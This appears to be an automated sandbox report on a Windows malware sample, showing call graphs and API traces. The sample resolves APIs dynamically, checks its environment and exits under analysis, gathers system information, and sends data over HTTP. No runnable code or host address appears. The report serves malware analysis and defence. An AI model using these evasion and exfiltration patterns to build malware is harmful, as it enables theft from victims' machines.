b04a60 2 API calls 26436->26437 26438 b044d8 26437->26438 26439 b04a60 2 API calls 26438->26439 26440 b044ee 26439->26440 26441 b04a60 2 API calls 26440->26441 26442 b04504 26441->26442 26443 b04a60 2 API calls 26442->26443 26444 b0451a 26443->26444 26445 b04a60 2 API calls 26444->26445 26446 b04530 26445->26446 26447 b04a60 2 API calls 26446->26447 26448 b04549 26447->26448 26449 b04a60 2 API calls 26448->26449 26450 b0455f 26449->26450 26451 b04a60 2 API calls 26450->26451 26452 b04575 26451->26452 26453 b04a60 2 API calls 26452->26453 26454 b0458b 26453->26454 26455 b04a60 2 API calls 26454->26455 26456 b045a1 26455->26456 26457 b04a60 2 API calls 26456->26457 26458 b045b7 26457->26458 26459 b04a60 2 API calls 26458->26459 26460 b045d0 26459->26460 26461 b04a60 2 API calls 26460->26461 26462 b045e6 26461->26462 26463 b04a60 2 API calls 26462->26463 26464 b045fc 26463->26464 26465 b04a60 2 API calls 26464->26465 26466 b04612 26465->26466 26467 b04a60 2 API calls 26466->26467 26468 b04628 26467->26468 
26469 b04a60 2 API calls 26468->26469 26470 b0463e 26469->26470 26471 b04a60 2 API calls 26470->26471 26472 b04657 26471->26472 26473 b04a60 2 API calls 26472->26473 26474 b0466d 26473->26474 26475 b04a60 2 API calls 26474->26475 26476 b04683 26475->26476 26477 b04a60 2 API calls 26476->26477 26478 b04699 26477->26478 26479 b04a60 2 API calls 26478->26479 26480 b046af 26479->26480 26481 b04a60 2 API calls 26480->26481 26482 b046c5 26481->26482 26483 b04a60 2 API calls 26482->26483 26484 b046de 26483->26484 26485 b04a60 2 API calls 26484->26485 26486 b046f4 26485->26486 26487 b04a60 2 API calls 26486->26487 26488 b0470a 26487->26488 26489 b04a60 2 API calls 26488->26489 26490 b04720 26489->26490 26491 b04a60 2 API calls 26490->26491 26492 b04736 26491->26492 26493 b04a60 2 API calls 26492->26493 26494 b0474c 26493->26494 26495 b04a60 2 API calls 26494->26495 26496 b04765 26495->26496 26497 b04a60 2 API calls 26496->26497 26498 b0477b 26497->26498 26499 b04a60 2 API calls 26498->26499 26500 b04791 26499->26500 26501 b04a60 2 API calls 26500->26501 26502 b047a7 26501->26502 26503 b04a60 2 API calls 26502->26503 26504 b047bd 26503->26504 26505 b04a60 2 API calls 26504->26505 26506 b047d3 26505->26506 26507 b04a60 2 API calls 26506->26507 26508 b047ec 26507->26508 26509 b04a60 2 API calls 26508->26509 26510 b04802 26509->26510 26511 b04a60 2 API calls 26510->26511 26512 b04818 26511->26512 26513 b04a60 2 API calls 26512->26513 26514 b0482e 26513->26514 26515 b04a60 2 API calls 26514->26515 26516 b04844 26515->26516 26517 b04a60 2 API calls 26516->26517 26518 b0485a 26517->26518 26519 b04a60 2 API calls 26518->26519 26520 b04873 26519->26520 26521 b04a60 2 API calls 26520->26521 26522 b04889 26521->26522 26523 b04a60 2 API calls 26522->26523 26524 b0489f 26523->26524 26525 b04a60 2 API calls 26524->26525 26526 b048b5 26525->26526 26527 b04a60 2 API calls 26526->26527 26528 b048cb 26527->26528 26529 b04a60 2 API calls 26528->26529 26530 b048e1 26529->26530 26531 b04a60 2 
API calls 26530->26531 26532 b048fa 26531->26532 26533 b04a60 2 API calls 26532->26533 26534 b04910 26533->26534 26535 b04a60 2 API calls 26534->26535 26536 b04926 26535->26536 26537 b04a60 2 API calls 26536->26537 26538 b0493c 26537->26538 26539 b04a60 2 API calls 26538->26539 26540 b04952 26539->26540 26541 b04a60 2 API calls 26540->26541 26542 b04968 26541->26542 26543 b04a60 2 API calls 26542->26543 26544 b04981 26543->26544 26545 b04a60 2 API calls 26544->26545 26546 b04997 26545->26546 26547 b04a60 2 API calls 26546->26547 26548 b049ad 26547->26548 26549 b04a60 2 API calls 26548->26549 26550 b049c3 26549->26550 26551 b04a60 2 API calls 26550->26551 26552 b049d9 26551->26552 26553 b04a60 2 API calls 26552->26553 26554 b049ef 26553->26554 26555 b04a60 2 API calls 26554->26555 26556 b04a08 26555->26556 26557 b04a60 2 API calls 26556->26557 26558 b04a1e 26557->26558 26559 b04a60 2 API calls 26558->26559 26560 b04a34 26559->26560 26561 b04a60 2 API calls 26560->26561 26562 b04a4a 26561->26562 26563 b266e0 26562->26563 26564 b26afe 8 API calls 26563->26564 26565 b266ed 43 API calls 26563->26565 26566 b26b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26564->26566 26567 b26c08 26564->26567 26565->26564 26566->26567 26568 b26cd2 26567->26568 26569 b26c15 8 API calls 26567->26569 26570 b26cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26568->26570 26571 b26d4f 26568->26571 26569->26568 26570->26571 26572 b26de9 26571->26572 26573 b26d5c 6 API calls 26571->26573 26574 b26f10 26572->26574 26575 b26df6 12 API calls 26572->26575 26573->26572 26576 b26f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26574->26576 26577 b26f8d 26574->26577 26575->26574 26576->26577 26578 b26fc1 26577->26578 26579 b26f96 GetProcAddress GetProcAddress 26577->26579 26580 b26ff5 26578->26580 26581 b26fca GetProcAddress GetProcAddress 26578->26581 26579->26578 26582 b27002 10 API calls 26580->26582 26583 
b270ed 26580->26583 26581->26580 26582->26583 26584 b27152 26583->26584 26585 b270f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26583->26585 26586 b2715b GetProcAddress 26584->26586 26587 b2716e 26584->26587 26585->26584 26586->26587 26588 b2051f 26587->26588 26589 b27177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26587->26589 26590 b01530 26588->26590 26589->26588 26899 b01610 26590->26899 26592 b0153b 26593 b01555 lstrcpy 26592->26593 26594 b0155d 26592->26594 26593->26594 26595 b0157f 26594->26595 26596 b01577 lstrcpy 26594->26596 26597 b01599 lstrcpy 26595->26597 26599 b015a1 26595->26599 26596->26595 26597->26599 26598 b01605 26601 b1f1b0 lstrlen 26598->26601 26599->26598 26600 b015fd lstrcpy 26599->26600 26600->26598 26602 b1f1e4 26601->26602 26603 b1f1f7 lstrlen 26602->26603 26604 b1f1eb lstrcpy 26602->26604 26605 b1f208 26603->26605 26604->26603 26606 b1f21b lstrlen 26605->26606 26607 b1f20f lstrcpy 26605->26607 26608 b1f22c 26606->26608 26607->26606 26609 b1f233 lstrcpy 26608->26609 26610 b1f23f 26608->26610 26609->26610 26611 b1f258 lstrcpy 26610->26611 26612 b1f264 26610->26612 26611->26612 26613 b1f286 lstrcpy 26612->26613 26614 b1f292 26612->26614 26613->26614 26615 b1f2ba lstrcpy 26614->26615 26616 b1f2c6 26614->26616 26615->26616 26617 b1f2ea lstrcpy 26616->26617 26658 b1f300 26616->26658 26617->26658 26618 b1f30c lstrlen 26618->26658 26619 b1f4b9 lstrcpy 26619->26658 26620 b1f3a1 lstrcpy 26620->26658 26621 b1f3c5 lstrcpy 26621->26658 26622 b1f4e8 lstrcpy 26668 b1f4f0 26622->26668 26623 b1f479 lstrcpy 26623->26658 26624 b1f59c lstrcpy 26624->26668 26625 b1f70f StrCmpCA 26630 b1fe8e 26625->26630 26625->26658 26626 b1f616 StrCmpCA 26626->26625 26626->26668 26627 b1fa29 StrCmpCA 26637 b1fe2b 26627->26637 26627->26658 26628 b1f73e lstrlen 26628->26658 26629 b1fd4d StrCmpCA 26632 b1fd60 Sleep 26629->26632 26642 b1fd75 26629->26642 26631 b1fead lstrlen 26630->26631 26635 b1fea5 lstrcpy 26630->26635 26638 b1fec7 
26631->26638 26632->26658 26633 b1fa58 lstrlen 26633->26658 26634 b1f64a lstrcpy 26634->26668 26635->26631 26636 b1fe4a lstrlen 26644 b1fe64 26636->26644 26637->26636 26639 b1fe42 lstrcpy 26637->26639 26645 b1fee7 lstrlen 26638->26645 26648 b1fedf lstrcpy 26638->26648 26639->26636 26640 b1f89e lstrcpy 26640->26658 26641 b1fd94 lstrlen 26657 b1fdae 26641->26657 26642->26641 26646 b1fd8c lstrcpy 26642->26646 26643 b1f76f lstrcpy 26643->26658 26651 b1fdce lstrlen 26644->26651 26652 b1fe7c lstrcpy 26644->26652 26649 b1ff01 26645->26649 26646->26641 26647 b1fbb8 lstrcpy 26647->26658 26648->26645 26656 b1ff21 26649->26656 26659 b1ff19 lstrcpy 26649->26659 26650 b1fa89 lstrcpy 26650->26658 26666 b1fde8 26651->26666 26652->26651 26653 b1f791 lstrcpy 26653->26658 26655 b1f8cd lstrcpy 26655->26668 26660 b01610 4 API calls 26656->26660 26657->26651 26663 b1fdc6 lstrcpy 26657->26663 26658->26618 26658->26619 26658->26620 26658->26621 26658->26622 26658->26623 26658->26625 26658->26627 26658->26628 26658->26629 26658->26633 26658->26640 26658->26643 26658->26647 26658->26650 26658->26653 26658->26655 26661 b1faab lstrcpy 26658->26661 26664 b01530 8 API calls 26658->26664 26665 b1fbe7 lstrcpy 26658->26665 26667 b1ee90 28 API calls 26658->26667 26658->26668 26673 b1f7e2 lstrcpy 26658->26673 26676 b1fafc lstrcpy 26658->26676 26659->26656 26685 b1fe13 26660->26685 26661->26658 26662 b1f698 lstrcpy 26662->26668 26663->26651 26664->26658 26665->26668 26669 b1fe08 26666->26669 26671 b1fe00 lstrcpy 26666->26671 26667->26658 26668->26624 26668->26626 26668->26627 26668->26629 26668->26634 26668->26658 26668->26662 26670 b1efb0 35 API calls 26668->26670 26674 b1f99e StrCmpCA 26668->26674 26675 b1f924 lstrcpy 26668->26675 26677 b1fc3e lstrcpy 26668->26677 26678 b1fcb8 StrCmpCA 26668->26678 26679 b1f9cb lstrcpy 26668->26679 26680 b01530 8 API calls 26668->26680 26681 b1fce9 lstrcpy 26668->26681 26682 b1ee90 28 API calls 26668->26682 26683 b1fa19 lstrcpy 26668->26683 26684 b1fd3a lstrcpy 
26668->26684 26672 b01610 4 API calls 26669->26672 26670->26668 26671->26669 26672->26685 26673->26658 26674->26627 26674->26668 26675->26668 26676->26658 26677->26668 26678->26629 26678->26668 26679->26668 26680->26668 26681->26668 26682->26668 26683->26668 26684->26668 26685->25709 26687 b22785 26686->26687 26688 b2278c GetVolumeInformationA 26686->26688 26687->26688 26689 b227ec GetProcessHeap RtlAllocateHeap 26688->26689 26691 b22822 26689->26691 26692 b22826 wsprintfA 26689->26692 26909 b271e0 26691->26909 26692->26691 26696 b04c70 26695->26696 26697 b04c85 26696->26697 26699 b04c7d lstrcpy 26696->26699 26913 b04bc0 26697->26913 26699->26697 26700 b04c90 26701 b04ccc lstrcpy 26700->26701 26702 b04cd8 26700->26702 26701->26702 26703 b04cff lstrcpy 26702->26703 26704 b04d0b 26702->26704 26703->26704 26705 b04d2f lstrcpy 26704->26705 26706 b04d3b 26704->26706 26705->26706 26707 b04d6d lstrcpy 26706->26707 26708 b04d79 26706->26708 26707->26708 26709 b04da0 lstrcpy 26708->26709 26710 b04dac InternetOpenA StrCmpCA 26708->26710 26709->26710 26711 b04de0 26710->26711 26712 b054b8 InternetCloseHandle CryptStringToBinaryA 26711->26712 26917 b23e70 26711->26917 26713 b054e8 LocalAlloc 26712->26713 26730 b055d8 26712->26730 26715 b054ff CryptStringToBinaryA 26713->26715 26713->26730 26716 b05517 LocalFree 26715->26716 26717 b05529 lstrlen 26715->26717 26716->26730 26718 b0553d 26717->26718 26720 b05563 lstrlen 26718->26720 26721 b05557 lstrcpy 26718->26721 26719 b04dfa 26722 b04e23 lstrcpy lstrcat 26719->26722 26723 b04e38 26719->26723 26725 b0557d 26720->26725 26721->26720 26722->26723 26724 b04e5a lstrcpy 26723->26724 26727 b04e62 26723->26727 26724->26727 26726 b0558f lstrcpy lstrcat 26725->26726 26728 b055a2 26725->26728 26726->26728 26729 b04e71 lstrlen 26727->26729 26731 b055d1 26728->26731 26733 b055c9 lstrcpy 26728->26733 26732 b04e89 26729->26732 26730->25738 26731->26730 26734 b04e95 lstrcpy lstrcat 26732->26734 26735 b04eac 26732->26735 26733->26731 
26734->26735 26736 b04ed5 26735->26736 26737 b04ecd lstrcpy 26735->26737 26738 b04edc lstrlen 26736->26738 26737->26736 26739 b04ef2 26738->26739 26740 b04efe lstrcpy lstrcat 26739->26740 26741 b04f15 26739->26741 26740->26741 26742 b04f36 lstrcpy 26741->26742 26743 b04f3e 26741->26743 26742->26743 26744 b04f65 lstrcpy lstrcat 26743->26744 26745 b04f7b 26743->26745 26744->26745 26746 b04fa4 26745->26746 26747 b04f9c lstrcpy 26745->26747 26748 b04fab lstrlen 26746->26748 26747->26746 26749 b04fc1 26748->26749 26750 b04fcd lstrcpy lstrcat 26749->26750 26751 b04fe4 26749->26751 26750->26751 26752 b0500d 26751->26752 26753 b05005 lstrcpy 26751->26753 26754 b05014 lstrlen 26752->26754 26753->26752 26755 b0502a 26754->26755 26756 b05036 lstrcpy lstrcat 26755->26756 26757 b0504d 26755->26757 26756->26757 26758 b05079 26757->26758 26759 b05071 lstrcpy 26757->26759 26760 b05080 lstrlen 26758->26760 26759->26758 26761 b0509b 26760->26761 26762 b050ac lstrcpy lstrcat 26761->26762 26763 b050bc 26761->26763 26762->26763 26764 b050da lstrcpy lstrcat 26763->26764 26765 b050ed 26763->26765 26764->26765 26766 b0510b lstrcpy 26765->26766 26767 b05113 26765->26767 26766->26767 26768 b05121 InternetConnectA 26767->26768 26768->26712 26769 b05150 HttpOpenRequestA 26768->26769 26770 b054b1 InternetCloseHandle 26769->26770 26771 b0518b 26769->26771 26770->26712 26924 b27310 lstrlen 26771->26924 26775 b051a4 26932 b272c0 26775->26932 26778 b27280 lstrcpy 26779 b051c0 26778->26779 26780 b27310 3 API calls 26779->26780 26781 b051d5 26780->26781 26782 b27280 lstrcpy 26781->26782 26783 b051de 26782->26783 26784 b27310 3 API calls 26783->26784 26785 b051f4 26784->26785 26786 b27280 lstrcpy 26785->26786 26787 b051fd 26786->26787 26788 b27310 3 API calls 26787->26788 26789 b05213 26788->26789 26790 b27280 lstrcpy 26789->26790 26791 b0521c 26790->26791 26792 b27310 3 API calls 26791->26792 26793 b05231 26792->26793 26794 b27280 lstrcpy 26793->26794 26795 b0523a 26794->26795 26796 b272c0 2 API 
calls 26795->26796 26797 b0524d 26796->26797 26798 b27280 lstrcpy 26797->26798 26799 b05256 26798->26799 26800 b27310 3 API calls 26799->26800 26801 b0526b 26800->26801 26802 b27280 lstrcpy 26801->26802 26803 b05274 26802->26803 26804 b27310 3 API calls 26803->26804 26805 b05289 26804->26805 26806 b27280 lstrcpy 26805->26806 26807 b05292 26806->26807 26808 b272c0 2 API calls 26807->26808 26809 b052a5 26808->26809 26810 b27280 lstrcpy 26809->26810 26811 b052ae 26810->26811 26812 b27310 3 API calls 26811->26812 26813 b052c3 26812->26813 26814 b27280 lstrcpy 26813->26814 26815 b052cc 26814->26815 26816 b27310 3 API calls 26815->26816 26817 b052e2 26816->26817 26818 b27280 lstrcpy 26817->26818 26819 b052eb 26818->26819 26820 b27310 3 API calls 26819->26820 26821 b05301 26820->26821 26822 b27280 lstrcpy 26821->26822 26823 b0530a 26822->26823 26824 b27310 3 API calls 26823->26824 26825 b0531f 26824->26825 26826 b27280 lstrcpy 26825->26826 26827 b05328 26826->26827 26828 b272c0 2 API calls 26827->26828 26829 b0533b 26828->26829 26830 b27280 lstrcpy 26829->26830 26831 b05344 26830->26831 26832 b05370 lstrcpy 26831->26832 26833 b0537c 26831->26833 26832->26833 26834 b272c0 2 API calls 26833->26834 26835 b0538a 26834->26835 26836 b272c0 2 API calls 26835->26836 26837 b05397 26836->26837 26838 b27280 lstrcpy 26837->26838 26839 b053a1 26838->26839 26840 b053b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26839->26840 26841 b0549c InternetCloseHandle 26840->26841 26845 b053f2 26840->26845 26843 b054ae 26841->26843 26842 b053fd lstrlen 26842->26845 26843->26770 26844 b0542e lstrcpy lstrcat 26844->26845 26845->26841 26845->26842 26845->26844 26846 b05473 26845->26846 26847 b0546b lstrcpy 26845->26847 26848 b0547a InternetReadFile 26846->26848 26847->26846 26848->26841 26848->26845 26850 b18cc6 ExitProcess 26849->26850 26865 b18ccd 26849->26865 26851 b18ee2 26851->25740 26852 b18d30 lstrlen 26852->26865 26853 b18e56 StrCmpCA 26853->26865 26854 b18d5a lstrlen 26854->26865 
26855 b18dbd StrCmpCA 26855->26865 26856 b18ddd StrCmpCA 26856->26865 26857 b18dfd StrCmpCA 26857->26865 26858 b18e1d StrCmpCA 26858->26865 26859 b18e3d StrCmpCA 26859->26865 26860 b18d84 StrCmpCA 26860->26865 26861 b18da4 StrCmpCA 26861->26865 26862 b18d06 lstrlen 26862->26865 26863 b18e88 lstrlen 26863->26865 26864 b18e6f StrCmpCA 26864->26865 26865->26851 26865->26852 26865->26853 26865->26854 26865->26855 26865->26856 26865->26857 26865->26858 26865->26859 26865->26860 26865->26861 26865->26862 26865->26863 26865->26864 26866 b18ebb lstrcpy 26865->26866 26866->26865 26867->25746 26868->25748 26869->25754 26870->25756 26871->25762 26872->25764 26873->25770 26874->25774 26875->25780 26876->25782 26877->25786 26878->25800 26879->25804 26880->25803 26881->25799 26882->25803 26883->25822 26884->25806 26885->25807 26886->25811 26887->25817 26888->25819 26889->25825 26890->25828 26891->25835 26892->25857 26893->25861 26894->25860 26895->25856 26896->25860 26897->25870 26900 b0161f 26899->26900 26901 b0162b lstrcpy 26900->26901 26902 b01633 26900->26902 26901->26902 26903 b0164d lstrcpy 26902->26903 26904 b01655 26902->26904 26903->26904 26905 b0166f lstrcpy 26904->26905 26907 b01677 26904->26907 26905->26907 26906 b01699 26906->26592 26907->26906 26908 b01691 lstrcpy 26907->26908 26908->26906 26910 b271e6 26909->26910 26911 b22860 26910->26911 26912 b271fc lstrcpy 26910->26912 26911->25735 26912->26911 26914 b04bd0 26913->26914 26914->26914 26915 b04bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26914->26915 26916 b04c41 26915->26916 26916->26700 26918 b23e83 26917->26918 26919 b23e9f lstrcpy 26918->26919 26920 b23eab 26918->26920 26919->26920 26921 b23ed5 GetSystemTime 26920->26921 26922 b23ecd lstrcpy 26920->26922 26923 b23ef3 26921->26923 26922->26921 26923->26719 26926 b2732d 26924->26926 26925 b0519b 26928 b27280 26925->26928 26926->26925 26927 b2733d lstrcpy lstrcat 26926->26927 26927->26925 26929 b2728c 26928->26929 26930 b272b4 26929->26930 
26931 b272ac lstrcpy 26929->26931 26930->26775 26931->26930 26933 b272dc 26932->26933 26934 b051b7 26933->26934 26935 b272ed lstrcpy 26933->26935 26934->26778 26936 b272fb lstrcat 26935->26936 26936->26934 26962 b231f0 GetSystemInfo wsprintfA 26953 b28471 121 API calls 2 library calls 26954 b14c77 295 API calls 26945 b1e0f9 140 API calls 26995 b16b79 138 API calls 26956 b08c79 malloc 26972 b1f2f8 93 API calls 26984 b0bbf9 90 API calls 26996 b01b64 162 API calls 26997 b272fb lstrcat 26966 b22d60 11 API calls 26998 b22b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 26999 b2a280 __CxxFrameHandler 26977 b11269 408 API calls 26957 b05869 57 API calls 26958 b22853 lstrcpy 26946 b22cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 26963 b101d9 126 API calls 26968 b13959 244 API calls 26947 b23cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 26985 b233c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27001 b18615 49 API calls 26960 b1e049 147 API calls 26986 b18615 48 API calls
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B04C7F
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04CD2
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04D05
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04D35
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04D73
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B04DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 88af1786fe6813cb4bb50d3a522afefeef088d33e0ec9a603e478d224e181a9e
                            • Instruction ID: 411bac599f4af61d9f9a8f431c061d64e88948c8eaa0594939d1133233a0450d
                            • Opcode Fuzzy Hash: 88af1786fe6813cb4bb50d3a522afefeef088d33e0ec9a603e478d224e181a9e
                            • Instruction Fuzzy Hash: 9C527F719106169BDB21EFA4DC89A9EBFF9EF44300F1444A4F905E7291DF74EC468BA0

                            Control-flow Graph

                            control_flow_graph 2125 b26390-b263bd GetPEB 2126 b265c3-b26623 LoadLibraryA * 5 2125->2126 2127 b263c3-b265be call b262f0 GetProcAddress * 20 2125->2127 2129 b26625-b26633 GetProcAddress 2126->2129 2130 b26638-b2663f 2126->2130 2127->2126 2129->2130 2131 b26641-b26667 GetProcAddress * 2 2130->2131 2132 b2666c-b26673 2130->2132 2131->2132 2134 b26675-b26683 GetProcAddress 2132->2134 2135 b26688-b2668f 2132->2135 2134->2135 2136 b26691-b2669f GetProcAddress 2135->2136 2137 b266a4-b266ab 2135->2137 2136->2137 2139 b266d7-b266da 2137->2139 2140 b266ad-b266d2 GetProcAddress * 2 2137->2140 2140->2139
                            APIs
                            • GetProcAddress.KERNEL32(77190000,018717C8), ref: 00B263E9
                            • GetProcAddress.KERNEL32(77190000,018716D8), ref: 00B26402
                            • GetProcAddress.KERNEL32(77190000,01871648), ref: 00B2641A
                            • GetProcAddress.KERNEL32(77190000,018716F0), ref: 00B26432
                            • GetProcAddress.KERNEL32(77190000,01878978), ref: 00B2644B
                            • GetProcAddress.KERNEL32(77190000,01865448), ref: 00B26463
                            • GetProcAddress.KERNEL32(77190000,018654C8), ref: 00B2647B
                            • GetProcAddress.KERNEL32(77190000,01871738), ref: 00B26494
                            • GetProcAddress.KERNEL32(77190000,01871780), ref: 00B264AC
                            • GetProcAddress.KERNEL32(77190000,01871678), ref: 00B264C4
                            • GetProcAddress.KERNEL32(77190000,01871768), ref: 00B264DD
                            • GetProcAddress.KERNEL32(77190000,01865468), ref: 00B264F5
                            • GetProcAddress.KERNEL32(77190000,01871690), ref: 00B2650D
                            • GetProcAddress.KERNEL32(77190000,018716C0), ref: 00B26526
                            • GetProcAddress.KERNEL32(77190000,01865488), ref: 00B2653E
                            • GetProcAddress.KERNEL32(77190000,018717E0), ref: 00B26556
                            • GetProcAddress.KERNEL32(77190000,01871540), ref: 00B2656F
                            • GetProcAddress.KERNEL32(77190000,018655C8), ref: 00B26587
                            • GetProcAddress.KERNEL32(77190000,018717F8), ref: 00B2659F
                            • GetProcAddress.KERNEL32(77190000,01865408), ref: 00B265B8
                            • LoadLibraryA.KERNEL32(01871888,?,?,?,00B21C03), ref: 00B265C9
                            • LoadLibraryA.KERNEL32(01871810,?,?,?,00B21C03), ref: 00B265DB
                            • LoadLibraryA.KERNEL32(01871870,?,?,?,00B21C03), ref: 00B265ED
                            • LoadLibraryA.KERNEL32(018718B8,?,?,?,00B21C03), ref: 00B265FE
                            • LoadLibraryA.KERNEL32(01871828,?,?,?,00B21C03), ref: 00B26610
                            • GetProcAddress.KERNEL32(76850000,018718A0), ref: 00B2662D
                            • GetProcAddress.KERNEL32(77040000,01871840), ref: 00B26649
                            • GetProcAddress.KERNEL32(77040000,01871858), ref: 00B26661
                            • GetProcAddress.KERNEL32(75A10000,01878D80), ref: 00B2667D
                            • GetProcAddress.KERNEL32(75690000,01865388), ref: 00B26699
                            • GetProcAddress.KERNEL32(776F0000,01878A98), ref: 00B266B5
                            • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00B266CC
                            Strings
                            • NtQueryInformationProcess, xrefs: 00B266C1
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 74d4ce33ab96e453db0b664d16d3ba667544e3f317c8af430758d434b06662c6
                            • Instruction ID: 1547e9b4343f1ffd61c94c588a70ce7bbde89302644af1086f9283d6fd6e6d31
                            • Opcode Fuzzy Hash: 74d4ce33ab96e453db0b664d16d3ba667544e3f317c8af430758d434b06662c6
                            • Instruction Fuzzy Hash: 31A192B9A11700DFD758DF65EEA8A26B7B9FB883413048519F906C3364DBB4A900EF70

                            Control-flow Graph

                            control_flow_graph 2141 b21bf0-b21c0b call b02a90 call b26390 2146 b21c1a-b21c27 call b02930 2141->2146 2147 b21c0d 2141->2147 2151 b21c35-b21c63 2146->2151 2152 b21c29-b21c2f lstrcpy 2146->2152 2148 b21c10-b21c18 2147->2148 2148->2146 2148->2148 2156 b21c65-b21c67 ExitProcess 2151->2156 2157 b21c6d-b21c7b GetSystemInfo 2151->2157 2152->2151 2158 b21c85-b21ca0 call b01030 call b010c0 GetUserDefaultLangID 2157->2158 2159 b21c7d-b21c7f ExitProcess 2157->2159 2164 b21ca2-b21ca9 2158->2164 2165 b21cb8-b21cca call b22ad0 call b23e10 2158->2165 2164->2165 2166 b21cb0-b21cb2 ExitProcess 2164->2166 2171 b21ce7-b21d06 lstrlen call b02930 2165->2171 2172 b21ccc-b21cde call b22a40 call b23e10 2165->2172 2178 b21d23-b21d40 lstrlen call b02930 2171->2178 2179 b21d08-b21d0d 2171->2179 2172->2171 2183 b21ce0-b21ce1 ExitProcess 2172->2183 2186 b21d42-b21d44 2178->2186 2187 b21d5a-b21d7b call b22ad0 lstrlen call b02930 2178->2187 2179->2178 2181 b21d0f-b21d11 2179->2181 2181->2178 2184 b21d13-b21d1d lstrcpy lstrcat 2181->2184 2184->2178 2186->2187 2188 b21d46-b21d54 lstrcpy lstrcat 2186->2188 2193 b21d9a-b21db4 lstrlen call b02930 2187->2193 2194 b21d7d-b21d7f 2187->2194 2188->2187 2199 b21db6-b21db8 2193->2199 2200 b21dce-b21deb call b22a40 lstrlen call b02930 2193->2200 2194->2193 2195 